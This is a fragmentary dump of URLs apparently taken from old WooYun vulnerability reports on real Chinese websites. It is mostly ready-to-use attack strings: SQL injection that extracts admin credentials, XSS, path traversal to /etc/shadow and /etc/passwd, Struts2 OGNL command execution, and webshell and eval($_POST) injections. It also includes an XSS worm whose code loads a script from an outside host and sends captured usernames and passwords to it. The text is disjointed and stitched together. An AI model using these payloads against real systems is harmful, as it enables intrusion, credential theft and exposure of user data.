/codeDetail.php?code=136987666&fr=0&city=chengdu&vt=3 /ajax/aj_sendCode.php?code=136987666 /10144/26371.shtml /login.txt /ELSNetAccept/chose/showitem_event.action /film_detail.php?cinema_id=1&cfilm_id=939',即可以确认漏洞。 test'+#13#10+'pass:gaimima','提示!',0 gov.cn /g/show.asp?site=cdbs&channel=homepage&category=homepage&type=column470x65&location=1 /g/out.asp?AID=112&FlightID=67&navId=141&page_id=7&Redirect=http://t.cdbs.com.cn/index.php?m=live&Values=1115 www.htinns.com /try/myTry.aspx?sn_uname=***(可替换任意用户或者id) /try/myTry.aspx?sn_uname=xxx111 /admin/login /blog.php?c=5 /zhuanti/more.php?cid=2884&p=1 /click.php?id=4 /download/search.php?year=0&type=2826&dl_keyword= /a/?aid=150630 /space.php?uid=629&t=5 
/data_json.php?cid=2784&num= /?type=2832 /zhuanti/2012amie/show.php?id=192 /SimpleHome.aspx /syslogin.aspx / /domain-admin/vdns.net?IDDomain=11639890 /wcm/xwcmhf/hfliuyan_content.jsp?liuyanid=26009 /main/sale/bestsellers1.asp?tid=59-16-2%27%20and%200%3C%3E%28select%20@@version%29-- www.china-pub.com/edition06/dl.asp?fjm=no&scriptname= /bussiness/page/new/index.html / /SlaughterSain /topicList.html /client/index.action /irun/uc/space.php?uid=1870758683 /irun/uc/attent_opt.php?uid=1870758683&do=add /bugs/wooyun-2013-021221 /BlogBoxAction.action这个页面。我们随意发表一篇日志。 /index.php?c=wall&a=topic&ak=801153264&t=test&fk=&fn=ss&rnd=1366774967396 18.0 /espcms/adminsoft/ /adminsoft /v2/?regnotify&email=%22;alert('xss');%3C/script%3E /install/ /index/login?username=ganjiwang%27%20and%201=%271&password=15101088540&logintype=0 /index/login?username=ganjiwang%27%20and%202=%271&password=15101088540&logintype=0 /index/login?username=ganjiwang%27%20and%20sleep(9)=%271&password=15101088540&logintype=0 /UserSmsInfo.aspx?ID=2169100 www.cosco.com /cn/search/index.jsp?key=mm zikao.hneao.cn/net /self-study/generate?exporttype=html&ks_zkz=911107300146(考籍号可遍历)&pages=0&reportname=ExamineeRepPrint&source_type=0 /self-study/ExamineeInfo.do?examinee_num=910803303608(考籍号可遍历)&method=exam /net/SchemeSpecialty.do?method=showUpdate&specialty_isn=558(可遍历) /net/net/signupSiteAction.do?method=querySpecialty&site_code=032301(考点代码) /net/pages/net/found_bkd_list.jsp?site_code=032301(考点代码) /net/pages/net/found_bkd.jsp zikao.hneao.cn /bbs /bbs/forum/forumdisplay?fid=1409024151041055 /bbs/post/show/?pid=5733484143661048390 /login/try?code=tfjt /zabbix/ /irun/uc/space.php?uid=1870758683 /irun/uc/space.php?uid=1870758683 /wp/wp-includes/js/plupload/plupload.flash.swf?id=0\%22%29%29}catch%28e%29{if%28!window.x%29{window.x=1;document.write /1.js /wp/wp-admin/theme-editor.php?file=404.php&theme=twentytwelve /cookie.php?c='+a /online/HotelInfo.aspx?Hotelid=00508069#”,预感到有些不妙,点击进入,发现直接进入后台,如图 /login/index.jsp 
/cgi-bin/result?p=a&r=content /manage/content/docmanage/previewImg1.jsp?filePath=/../..//../..//../..//../..//../..//etc/shadow%00.jpg /manage/content/docmanage/download.jsp?filePath=/../..//../..//../..//../..//../..//etc/shadow /newmondeo/api/poster_send.php?content=微博内容 /admin/RegUploadFile.aspx?ParentTextName=TX_qsUploadPicUrl&ParentDivName=DIV_qsUploadedPic&ParentSizeName=TX_qsUploadPicSize&ParentTypeName=TX_qsUploadPicType&TA_Question=TA_Question199240&lang=chs /reg/forgetpass/?uid=自己的id&hash=WWZSR+1Y7d+Gk3f8IzfdJqCMquu5CrStbQ== /reg/sendPass/?userName=0&auth_code=csn6&user_id=286505中得user_id=286505 /index.php?cl=freeaction&at=index&from=md&uid=14611《科学小超人》万人体验行动,填写信息即可免费申领物品!在填表处,提供的手机需要进行手机验证,但可以绕过! / /bugs/wooyun-2010-022384 /businesshall/Captchar!getCaptchar.action /edi/user!login.action /app/create /loreal/s2.php?id=2 /bugs/wooyun-2013-022617这个,遂有了好奇心(ps:好奇心害死人啊)便百度搜索,被找到了,看了弱口令 /user/mod_mblog.php t.qq.com/CaoYebo1999 /manager/login.aspx /upfile/201304271609503754158.asp document.cookie /developer/is_login /Cart/Register.do /Cart/Register.do?parendId=0&Email=sex%2540126.com&loginId=foxxx&password=sexsex11&password2=sexsex11&invitationCode=&know_womai=%25E6%259C%258B%25E5%258F%258B%25E4%25BB%258B%25E7%25BB%258D&know_womai=%25E6%2590%259C%25E7%25B4%25A2%25E5%25BC%2595%25E6%2593%258E&know_womai=%25E4%25BF%2583%25E9%2594%2580%25E5%258D%2595&know_womai=%25E8%25AE%25BA%25E5%259D%259B&know_womai=%25E6%2596%25B0%25E9%2597%25BB&know_womai=%25E5%2585%25B6%25E4%25BB%2596&validateCode=au6q&=on&providerName=userRegistExtentionAttribute&memberGroup=1&parentId=0&mid=0&usertype=1&returnUrl=&callback=jsonp1367119154807&_=1367119289017 20.0 /swf/duanzi.swf /641010080/weibo/friends/add?g_tk=1329581857 /360.exe /360.exe /360.exe /share/link?shareid=450929&uk=3961677986 20.0 /apilibproxy.html /641010080/weibo/t/re_add /641010080/weibo/t/re_add /logs/ / / /index1.php / /3g/tech/proc/comment/cmnt_list.php?vt=1&did=1160281&sid=121304&cmntg=1&tid=84&vid=44 
/personinfosearch.do?method=init /login.do?method=init /qqshow_v3/htdocs/live/popup/huipu/popup.html?domain=com none /qqshow_v3/htdocs/live/popup/huipu/popup.html?domain=com /anti_theft/ /anti_theft/get_bindphone_json.jsp /index.php?a=goodsShow&c=goods&m=content&gid=1%27%22 /index.php?a=like&c=goods&m=content&uid=849976%%27%20and%201=1%20and%20%27%%27=%27 /cpa.php?id=7 /user/userpicupload.net?IDContact=42551326 /user/userpicupload_submit.net?IDContact=42551326&type=CONTACT /index.php?m=content&c=goods&a=myhome&uid=884382 /?c=member&m=room&a=note&id=21 /?c=member&m=album&a=albumlist&uid=1024162 /home.action / /programs/view/id-10.html /programs/view/id-541.html app.sh.sohu.com pkmore1.php?id= /login.action /resin-doc/examples/security-basic/viewfile?file=WEB-INF/password.xml /website/admin.htm / www.hljlr.gov.cn这个站的ip是72 /shownews.aspx?id=35 /正式我们要找的目标 /JsFront/ZJManage/xinxiang/ZxtsList.aspx?BoxGroupID=9fcf491d-3736-497a-a2e4-03e682bfb788 /honor.php?id=%Inject_Here%-1%20or%20104%3d102 /news/newscontent.aspx?newsid=305 / /dpool/sports/live/xlivefoot/index.php?from=oldlive&match_id=2013042901&oid=livesina&vt=4 /dpool/sports/live/xlivefoot/index.php?from=oldlive&match_id=2013042901 /dpool/sports/live/xlivefoot/index.php?from=oldlive&match_id=2013042901 /IOC/client/login!index.action /info.php找到网站根目录,然后访问http://client31.v.vnet.mobi/images/upload.php,直接指定目录,上传php大马。 /?product-gnotify /?product-gnotify /list_search/0/%2527union+select+1+from+ /account/recharge.do?method=alipay&money=399” /account/recharge.do?method=alipay&money=任意金额” /Index.action /pgsh/index.action /jjxt/Index.action /school/index.action?ID=210204500001 /login.do /admin/register/index.action /suite/login.do /suite/login.do /suite/login.do /suite/login.do /suite/login.do /suite/login.do?portalId=A&siteKey=0 /skills/login.do /skills/login.do /admin/Login.do /login.do /homeinnsupload/ /homeinnsformmt/resv/resv.aspx 
/service/bill/fycx/downdloaddetail.jsp?BeginDate=201304&EndDate=201304&QueryType=1&AreaCode=0853&AccNbr=[马赛克 /w83/album-aid-11678296.html /htmleditor/extendfile/UploadFile.jsp /mngr/statist/getUserStatList.action /topic/hcc/WEB-INF/ /topic/hcc/WEB-INF/web.xml /topic/hcc/WEB-INF/classes/userinfo.xml /topic/hcc/login.jsp /cn/search.aspx?k=1';select%20*%20from%20sysobjects%20where%20@@version%3E0;-- /cn/search.aspx?k=1';select /image/2013/5/1/1367396666488.jsp?pwd=023&cmd=netstat /?c=member&m=room&a=note&id=20 /?c=member&m=album&a=albumlist&uid=1021880 /?c=member&m=room&a=note'&id=20 /area.action /usr/local/software/glassfish3122/glassfish3/glassfish/lib/monitor/flashlight-agent.jar /usr/local/software/jdk1.6.0_34/jre/lib/amd64/server:/usr/local/software/jdk1.6.0_34/jre/lib/amd64:/usr/local/software/jdk1.6.0_34/lib/amd64:/usr/java/packages/lib/amd64:/usr/lib64:/lib64:/lib:/usr/lib /dazhon/searchBybigIdListAction.action //plus/search.php?keyword=as&typeArr[111%3D@`\ /drluowei/ask.php?doctoruser=drluowei&doctorid=18529&title=&pathid=3 /login.do /list_videos.do / /p/freecms/ /esteelauders//api/user-info-list?ps=10000 /el/page-02的盲打漏洞获得到的,然后发现这地址竟然是任意条件都可以访问额(不登陆都可以访问额。如果只有管理权限可以访问的话,也就不会存在这个帖子了,肯定会和之前的盲打后台帖子发一起的)。 /msg.ww?site=cntaobao&charset=utf-8&v=2&uid=***&s=1 /msg.aw?site=&v=&uid=1&s=& /2.aspx / /admin/menu.asp /admin/login.php /bground/login.php /bm/detail.php?gid=21&id=64 /api/account/update/ /showfavor.php?id=348330 /123.txt /upload/3911/1123/14/1_20005689.xls /mgmt/system/ /mgmt/system/registerName/registerNameList.do /index.php?m=my&c=follow&a=add&uid=1 /index.php?m=my&c=follow&a=delete&uid=1 /api/post/modify/ /OurHome/modules/core/Login.jsp /resume_preview.php?uid=1934876495&key=UiAHYFZmAW8%3D /resume_preview.php?uid=1&key=UiAHYFZmAW8%3D /resume_preview.php?uid=5&key=UiAHYFZmAW8%3D /resume_preview.php?uid=r&key=UiAHYFZmAW8%3D /wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options%28%29;passthru%28ls%29;error 
/wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();eval($_POST[cmd]);error /question.tar /el/page-02 /这个域名被黑,已被别人利用, /item.htm?id=318299998327这个是钓鱼链接 /被转向hao123做广告 /login_view.action /RU123/show.asp?id=612 /Web/Users/login.asp /public/Menu.xml处可全部看到 /frontNewsCenter_showAllInfo.action?newsCenterMark=2&urlInfo=http://www.baidu.com /ecshop/admin/shopinfo.php?act=edit&id=111 / /profile/?short_name=187528&type=9&vid=26361 / /XSS pinyin.cn sohu-inc.com / /conf/server.xml /conf/web.xml /conf/tomcat-users.xml /conf/context.xml /wwwpps/login.jsp找回密码 /user!login.do /examples/ http://he.189.cn/qcQues/quesListInfo.action http://shop.xj.189.cn/eshop/terminal/terminal_info.do http://js.189.cn/redPackets/goRedPackets_home.do www.dedeeims.com http://220.181.11.48:8080/resin-doc/viewfile/?file=/doc/install.xtp http://220.181.11.48:8080/resin-doc/viewfile/?file=index.jsp http://88agent.com/step/index.action http://wooyun.org/bugs/wooyun-2012-012293 http://www.xinnet.com/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../ http://hymanage.xinnet.com/Modules/common/components/FCKeditor/editor/dialog/fck_about.html http://manage.xinnet.com/Modules/common/components/FCKeditor/editor/filemanager/browser/default/connectors/test.html http://www.wandafilm.com/user/card_mgr.do?m=initRecharge&cardNo=8002012036436 http://m.3g.qq.com/account.html?uid=59e0434******b3475a17dc10d5ce912&fr=2&aid=aullik5 http://m.3g.qq.com/account.html?uid=59e0434******b3475a17dc10d5ce912&fr=2&aid=aullik5 http://220.181.125.88:8080/stat.do www.xiaomi.com和其它域名咋办呐? 
https://account.xiaomi.com/pass/serviceLogin?callback=...&sid=eshopmobile,重点是eshopmobile(eshopmobile时会去app.shopapi.xiaomi.com同步登录一下),而网页版的为eshop https://account.xiaomi.com/pass/serviceLogin?callback=...&sid=eshopmobile,主域名和其它域名也能js劫持了。 https://account.xiaomi.com/pass/serviceLogin?callback=http%3A%2F%2Fapp.shopapi.xiaomi.com%2Fv1%2Fauthorize%2Fsso_callback%3Ffollowup%3Dhttp%253A%252F%252Fm.xiaomi.com%252Findex.html%2523ac%253Daccount%2526op%253Dindex%26sign%3DMjIzYzEwMzEzODg1NmI0ZGI2OGViZDljOGRlNjZmOTExYjE1NDBlNw%2C%2C&sid=eshopmobile http://app.shopapi.xiaomi.com/v1/address/list?callback=getall&client_id=180100031013&_=1367750497612 http://net.njfu.edu.cn/web/manager/ http://net.njfu.edu.cn/web/plugin/download.jsp?id=258&for_key=324 http://net.njfu.edu.cn/web/manager/main/index2.jsp http://220.181.143.195/admin http://220.181.143.203/admin http://220.181.143.209/admin http://220.181.143.196/admin http://220.181.143.224/admin http://220.181.143.210/admin http://220.181.143.204/admin http://llh.ecnu.edu.cn/NewsType.asp?SmallClass='%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20''= http://llh.ecnu.edu.cn/admin www.dbsdzb.com/NewsType.asp?SmallClass= http://tieba.baidu.com/f/search/res?ie=utf-8&qw=mo%2Fq- http://218.30.115.183/index.jsp http://218.30.115.188/admin/ http://localhost:8082/ECShop_V2.7.3/admin/integrate.php?act=install&code=../../../../ECShop_V2.7.3/data/feedbackimg/6_20130506toqbvy.txt%00 http://play8.pcgames.com.cn/pcgames120903/list.jsp?pageNo=-1 http://play8.pcgames.com.cn/pcgames120903/list.jsp?p=%E2%80%98-1&k=%A1%AE http://126.am/70Qdp3';h.appendChild(s) filter:alpha(opacity=0) moz-opacity:0;opacity:0 http://www.acfun.tv@126.am/n6ccT0]http://www.acfun.tv/v/ac634542[/url http://www.acfun.tv/api/mail.aspx?name=newMail位置没有来源验证: http://www.acfun.tv/api/mail.aspx?name=newMail http://www.acfun.tv@126.am/n6ccT0]http://www.acfun.tv/v/ac634542[/url 
http://61.144.19.121:5600/down/detailLocalFile.jsp?filename=/WEB-INF/web.xml&name=%D7%E9%D6%AF%BB%FA%B9%B9%B4%FA%C2%EB%D6%A4.jpg&A83C69FBA585B0CA06ADBAA19CC43EF36=CpnvRLGdHjTqQY7mypL8RWTBLy7DC8cvQ0NvTSfYfmLvLdqWyPZ8!-213033169!1367868989698 http://java.sun.com/xml/ns/j2ee xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd http://www.yintai.com/product/productdetail.aspx?itemcode=20-277-4661C http://www.licence.org.cn:8080/licencezgyq0209.sql http://www.adata-group.com http://xl.tgbus.com/ http://wowdb.tgbus.com/manager/NPC_List.aspx http://api.tgbus.com/comment2/admin/login.aspx http://wowdb.tgbus.com/Search.aspx?keyword=1%27 http://www.sxu.edu.cn/zncs/sdzx/shuidian/anli.asp?Sort_ID=26,注入类型为:整型(integer)、数据库为access数据库、脚本语言为asp http://www.trueqq.com/jiaoyou.php?mod=search&residecity=%27%20or%20@%60%27%60%20and%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28select%20concat%280x7e,0x27,unhex%28hex%28user%28%29%29%29,0x27,0x7e%29%29%20from%20information_schema.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20or%20@%60%27%60%20and%20%271%27=%271 http://lady.weibo.com http://lady.weibo.com/topic/191 http://www.ias.fudan.edu.cn/File.aspx?filepath=/default.aspx,通过修改filepath的值可以实现任意文件下载,导致源码泄露。恶意攻击者能够通过该漏洞下载数据库配置文件,从而进一步攻击,获取更高权限。 data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+ http://mail.***.cn/webmail/index.php?action=framesetsV2 http://bangong.zhongxi.cn/edoas2/oa.jsp http://bangong.zhongxi.cn/edoas2/oa.jsp http://bangong.zhongxi.cn/jmx-console/HtmlAdaptor?action=displayMBeans http://tsg.zhongxi.cn/lib.libone.action http://wooyun.org/bugs/wooyun-2010-010949 http://jwxt.zhongxi.cn/JWWEB/_data/ http://jpkc.zhongxi.cn/guanli/login.php?msg=2 
http://jpkc.zhongxi.cn/teacher.php?cnid=3OWMEO7XL6WAANGDJ13WHYVU40NVYRFF&ctid=Y1M2DJPUJCO92GGN4IUEFWY1LS5AQNDY&ccid=OJFRPROTJEIDH4RQVYU7OPLYA7UII9AU http://www.exploit-db.com/exploits/24272/。 http://house.china.com.cn/searchdir/esfsearch.aspx?ddlbuy=0 URL:http://love.sina.com.hk/cgi-bin/search/list.cgi?action=showpage&total=3129&listid=27 http://kan.duowan.com/1304/230995638943.html URL:http://www.syfc.gov.cn/fcdw/index.action http://wooyun.org/bugs/wooyun-2013-021270 http://zs.nacta.edu.cn/front/cms/article!cmsView.action http://video.nacta.edu.cn/l29-xielm9ox/photo/thanks.php http://59.65.196.30/inc/article.php?action=read&id=46 http://www.suidian.cn/Ct_details_id_5551.shtml http://www.suidian.cn/Ct_details_id_5551'.shtml,如图 http://www.suidian.cn/Ct_details_id_5551 http://www.suidian.cn/Ct_details_id_5551 http://keyun.96520.com http://card.yintai.com/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/jsp/connector http://www.ekahau.com/products/real-time-location-system/wi-fi-tags.html http://www.ekahau.com/products/real-time-location-system/overview.html http://www.ekahau.com/ URL:http://sports.sina.com.hk/cgi-bin/vote/forum.cgi?action=result&id=28 http://up.qlwb.com.cn/op/list.asp?t=0 http://up.qlwb.com.cn/newpic/201210189475996.asp http://up.qlwb.com.cn/newpic/201210189492139.asp;jpg http://www.ooopic.com/ http://user.ooopic.com/user/login.php http://product.aili.com/index.php?m=member&c=index&a=register&siteid=1 http://product.aili.com/api.php?op=add_favorite&url=demon.aaa&title=%2527 
http://product.aili.com/api.php?op=add_favorite&url=pro&title=%2527%2520and%2520%2528select%25201%2520from%2528select%2520count%2528%252a%2529%252Cconcat%2528%2528select%2520%2528select%2520%2528select%2520concat%25280x23%252Ccast%2528concat%2528username%252C0x3a%252Cpassword%252C0x3a%252Cencrypt%2529%2520as%2520char%2529%252C0x23%2529%2520from%2520pro_admin%2520LIMIT%25200%252C1%2529%2529%2520from%2520information_schema.tables%2520limit%25200%252C1%2529%252Cfloor%2528rand%25280%2529%252a2%2529%2529x%2520from%2520information_schema.tables%2520group%2520by%2520x%2529a%2529%2520and%2520%25271%2527%253D%25271 http://id.yy.duowan.com/save_man_info.php http://i.sohu.com http://i.sohu.com/p/=v2=aaBh5ULzWW9pVYYtpmNvbQ==/blog/view/260587564.htm http://i.sohu.com/a/app/discuss/save.htm?_input_encode=UTF-8 http://t.sohu.com http://t.sohu.com/ http://t.sohu.com/twAction/reTwitter http://register.mail.sohu.com/servlet/getUnreadMailCountServlet?callback= http://88agent.com/qywh/4028f8ae3d8025e5013d80ad73e30014.action http://www.[马赛克]vip.com/qq9914932/adad/isee.asp?txtSearch=&OrderList=1&Submit=++%B2%E9%BF%B4%B1%BE%D1%F9%B1%BE%D7%CA%C1%CF%B5%E3%BB%F7%CE%D2--%CC%E1%BD%BB++&showtag=1&showlaox=1 http://www.[马赛克]muma.com/t2.txt http://widget.weibo.com/dialog/follow.php http://widget.weibo.com/dialog/follow.php?fuid=1922455660&refer=&language=zh_cn&type=widget_page&vsrc=app_followbutton%27%7D%3Bonload=function%28%29%7BSTK.scriptLoader%28%7Burl%3A%27http%3A%2F%2Fmxss.sinaapp.com%2Ffish.js%27%7D%29%7D%3Bb%3D%7Ba%3A%27 http://widget.weibo.com/dialog/follow.php?fuid=1922455660&refer=&language=zh_cn&type=widget_page&vsrc=app_followbutton%27%7D%3Bonload=function%28%29%7BSTK.scriptLoader%28%7Burl%3A%27http%3A%2F%2Fmxss.sinaapp.com%2Ffish.js%27%7D%29%7D%3Bb%3D%7Ba%3A%27&r="+Math.random() uid:1981622273 onComplete:function() uid:1922455660 onComplete:function() content:encodeURIComponent(blog+xss_url),appkey:1629860458 onComplete:function() 
content:encodeURIComponent(encodeURIComponent(topic+blog+xss_url)),appkey:2191225368,refer:'www.google.com.hk',language:'zh_cn',url_param:'',_t:0 http://mxss.sinaapp.com/g.php?n="+encodeURIComponent(name)+"&p="+encodeURIComponent(pass) keyCode:window.event.keyCode http://mes.4006055885.com http://www.lezu.net.cn/可以上传附件 http://mashifu.astro.ifeng.com//tupian.php?act=config.php http://mashifu.astro.ifeng.com//tupian.php?act=c:\boot.ini PHPINFOhttp://mashifu.astro.ifeng.com/test.php http://365net.tw/about/up/upload_flash.asp?formname=myform&editname=picpath1&uppath=uploadpic&filelx=jpg http://vip.offcn.com/index.php?app=zxtk&mod=Index&act=showinfo&categoryId=1&id=438漏洞好像有几处,测试时忘记保存了,你们自己再详细测试吧。 http://118.244.192.161/user/ http://www.zfs4.com/jdty.html http://www.scau.edu.cn/xw/201305/t20130508_116682.htm http://www.sogou.com/quan?query=%E6%A2%A7%E6%A1%90%E9%9B%A8&qt=zhaopin%22}%0aalert(1)//&sourceid=inttab_news http://www.sogou.com/quan?query=%E6%A2%A7%E6%A1%90%E9%9B%A8&qt=zhaopin%22}%0aeval(location.href=%22http://wutongyu.info%22)//&sourceid=inttab_news http://www.sogou.com/quan?query=梧桐雨&qt=zhaopin"}%0a%0a%0aeval("\u006c\u006f\u0063\u0061\u0074\u0069\u006f\u006e\u002e\u0068\u0072\u0065\u0066\u003d\u0027\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0077\u0075\u0074\u006f\u006e\u0067\u0079\u0075\u002e\u0069\u006e\u0066\u006f\u0027")//&sourceid=inttab_news http://smezj.sme.gov.cn/index.action http://smezj.sme.gov.cn/index.action http://211.167.243.131/indexAction!login.action http://zcps.tjmec.gov.cn/user!save http://www.ychdj.gov.cn/index.action http://www.ychdj.gov.cn/articleMsg.action?articleId=3365&channelId=6a http://minqi.china.com.cn/do/s_rpc.php http://ris.ccb.com/journalx/secure/admin/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector http://mail.qq.com/cgi-bin/mail_spam?action=check_link&url=javascript:alert(document.cookie) http://www.dlbc.org.cn/login/Jeecms.do http://220.176.160.51:8899/DBSMS/main/ 
http://220.176.160.51:8899/DBSMS/sys/DataLink.aspx http://220.176.160.51:8899/dbsms/main/Main.aspx http://v.huatu.com/home/memberInfo.php?rid=2363643 http://www.gewara.com/sport/itemList.xhtml?pageNo=1&showtype=list&type=-1 http://www.gewara.com/sport/itemList.xhtml?pageNo=1&showtype=list&type=-1%27%20or%20%2741%27%3d%2741 http://www.tuigirl.com/alipay/alipayto.php?orderid=201305091050293&subject=%E6%A0%87%E5%87%86%E8%AE%A2%E9%98%85&total_fee= http://m.t.58.com/css/logout http://www.tompda.com/list/?cid=1&Querys=&o=article_addtime http://ffp.airchina.com.cn/admin/adminLogin.jsp http://kf.joyoung.com/iwanttoanswerlist_.html?pscode=ff8080813835c7d201384bd1da9c0333 http://bbs.jeecms.com http://202.96.31.16:8080/vrd/front/userInfo/gotoIndex.action?temp=4 http://photowoo.renren.com/?ngAdID=04P55 http://chaxun.766.com/zx/clcx/index.php/admin/ http://mail.156.cn/ http://bbs.aili.com/plugin.php?id=pointsMall:product_list&ailibnumfrom=0&ailibnumto=50%20order%20by%202-- http://so.91.com/search.jsp http://ebook.91.com/Common/Search.aspx?Rank=PublishDateDesc&pagesize=10&searchKey= http://author.ks.91.com/Handler/Login.ashx?_post___VIEWSTATE=%2FwEPDwUKMTQ5MDIxNjIyMmRkM2nqliGdFaBBzEZY4%2BItXrE%2BZhw%3D&__SCROLLPOSITIONX=0&__SCROLLPOSITIONY=0&__EVENTTARGET=&__EVENTARGUMENT=&account=88952634&pawwsord=88952634&autologin=on http://babybook.91.com/的路径爆出 http://jia.91.com/index.php?c=search&type=bb&class=tag&id=282 http://tu.91.com/index.php?c=user&a=index&gid=&uid=140192398&t=1这个页面为例,跳转页码的type这没有限制 http://sj.bbs.91.com/thread/26/434/20100302/plugin.php?id=dsu_amupper:list http://music.baidu.com/search?key=aaaaaaaaa%27%20onload=%27alert%281%29 http://xui.ptlogin2.qq.com/cgi-bin/qlogin?jumpname=&style=11 http://www.qq.com/?clientuin=aaa&clientkey=bbb http://fuxing.chnmuseum.cn/news_atc.php?id=97 http://fuxing.chnmuseum.cn/guestbook.php http://centennial.chnmuseum.cn/news_content.php?id=38 http://ncz.yeepay.com/存在命令执行漏洞,借助struts2的私有变量class.classLoader.jarPath可 javascript:history.back() 
javascript:history.back() javascript:history.back() http://bookcity.dayoo.com/index.php?module=product&app=product&typeHandler=book&action=search&type=4&text=I24 http://shop.ehuatai.com/isale/report/reportAction-insertPre.action http://114.255.169.92/data.rar http://www.51ey.com/loginAction!login.action http://ris.ccb.com/CN/feedback/backdoor.jsp http://ris.ccb.com/CN/feedback/ http://ris.ccb.com/journalx/secure/admin/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=File&CurrentFolder=../../../../Jweb_tzyj/CN/feedback/ http://newcourse.juren.com/index.php?se=9cb530c91de6478097704ff2e166e0ec&ct=2dd4ab50067243bba4e84bcbefa4e00d&tst=b5e2ed0589694a36a236228efec04005 http://course.juren.com/showCourse.php?school_id=8a80479536a9ea0a0136bdf656de77f8 http://newcourse.juren.com/showCourse.php?school_id=345f10a024ef11e2ac800000c9ac71fe http://www.juren.com/temp/ http://www.juren.com/sitemap.xml http://dkp2.duowan.com/member.do?method=member_list&guildid=herowow&dkpid=1504&work=sq&orderBy=ccount,if http://dkp2.duowan.com/member.do?method=member_list&guildid=herowow&dkpid=1504&work=sq&orderBy=ccount,if http://db.duowan.com/mt/card/list.html?conditions[sort]=userView%20desc%20limit%201%23.desc http://work.china.alibaba.com http://webscan.360.cn/vul/list http://c17.yunpan.360.cn/my#%2F%3Cimg%20src=x.com%20onerror=alert%28/test/%29%20/%3E%2F http://fang.xiashanet.com/common/lib/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media http://abs.apple.com/ssurvey/thankyou.action http://csat.apple.com/ssurvey/thankyou.action http://www.chem.pku.edu.cn/dxhx10/managenews/index.htm http://wuxi.ss.pku.edu.cn/getFNL.action?cateIden=3 http://www.gse.pku.edu.cn/jchjy/admin/admin_login.asp http://pri.pku.edu.cn:8081/lvyou/ http://ccl.pku.edu.cn:8080/pos/Implication/administrator.jsp http://zzb.pku.edu.cn/bdcms/pku/survey/ViewVoteForm.do?qid=9 http://skb.pku.edu.cn/list.asp?ClassID=05121309452360510 
http://www.cpc.pku.edu.cn/view.asp?type=ours&id=77 http://www.dag.pku.edu.cn/tuji/jsdxt.asp?nclassid=71 http://www.metc.pku.edu.cn/dd.php?id=368 http://www1.law.pku.edu.cn/news/articledisplay.asp?NewID=6456 http://www.ati.pku.edu.cn/system/list.php?type=3 http://lecture.pku.edu.cn/index.php?action=&typeid=26 http://courseweb.pku.edu.cn/course/www/list.php?cat_id=25 http://www.tv.pku.edu.cn/show.asp?id=1322 http://www.yuchengtech.com/cms https://mail.qq.com http://www.wooyun.org/bugs/wooyun-2010-021473/ http://mail.cetc.com.cn/admin/ http://mobius.qyer.com/login_deal.php?password=111111&account=1 http://crm.263.net/存在命令执行漏洞,借助struts2的私有变量class.classLoader.jarPath可以执行任意命令(并且是root权限),很可能获得webshell(当然我没有尝试获取)。由于是销售管理系统,有登录的地方,可能会威胁到用户的数据安全。因为是以root权限执行任意命令,可获得服务器完全控制权,并且可能以这台服务器为跳板威胁周围其它服务器的安全。 http://www.yy.com/gateway/isuserlogined?callback=YYNavbarUDB.checkLoginCallback处可以直接插入script代码来导致一个xss漏洞的存在。 http://183.61.6.68:8080/resin-doc/examples/security-basic/viewfile?file=WEB-INF/password.xml http://huodong.duowan.com/js/.svn/entries该站点很多目录都存在svn,会泄漏文件路径及目录结构以及源代码泄漏。 http://huodong.duowan.com/apc.php该处存在apc信息泄漏。 http://huodong.duowan.com/log.txt该处存在敏感信息泄漏,包括用户名以及密码等信息。 http://xiage.yy.com/research.php?rid=1%20and存在sql注射漏洞。 http://202.204.190.42/oa_client/info.aspx http://202.204.190.42/oa_server/App_Pages/App_frame_Server/UserLogin.aspx http://202.204.190.42/oa_server/App_Pages/App_frame_Server http://202.204.190.42/oa_server/App_Pages/App_page/SchoolList.aspx http://202.204.190.42/oa_server/App_Pages/App_page/user_list.aspx http://202.204.190.42/oa_server/App_Pages/App_page/UserSpuerAdd.aspx http://yzddpk.jstv.com http://group.100e.com/14004/topic/101428/index.aspx?UserID=2487728 http://my.weke.com/loginAction.action http://www.glpay.com.cn/?act=download http://www.glpay.com.cn/?act=download&path=../../../etc/passwd http://shop.hisense.com/dwr/test/DWRSearchUserService http://www.womai.com/dwr/test/DWRSearchUserService 
http://www.womai.com/dwr/test/DWRSearchUserService www.womai.com http://localhost/src/attachview.php?path=相对路径 http://id.kingdee.com/存在命令执行漏洞,借助struts2的私有变量class.classLoader.jarPath可以执行任意命令(并且是root权限),很可能获得webshell(当然我没有尝试获取),进而可能威胁到用户的数据安全。因为是以root权限执行任意命令,可获得服务器完全控制权,并且可能以这台服务器为跳板威胁周围其它服务器的安全。 club.qd10010.cn/admin/ http://www.dahuatech.com/download.aspx http://60.191.94.116/erepair/DeviceQuery.aspx http://123.233.247.74/wjj_site/ldaplogin/login_login.action http://123.233.247.74/wjj_site/ldaplogin/login_login.action?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g) http://123.233.247.74/wjj_site/ldaplogin/login_login.action?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g) http://www.srcwork.com http://113.106.x.x9/admin/x/xfig/.svn/text-base/test.inc.php.svn-base www.kugou.com/]$ 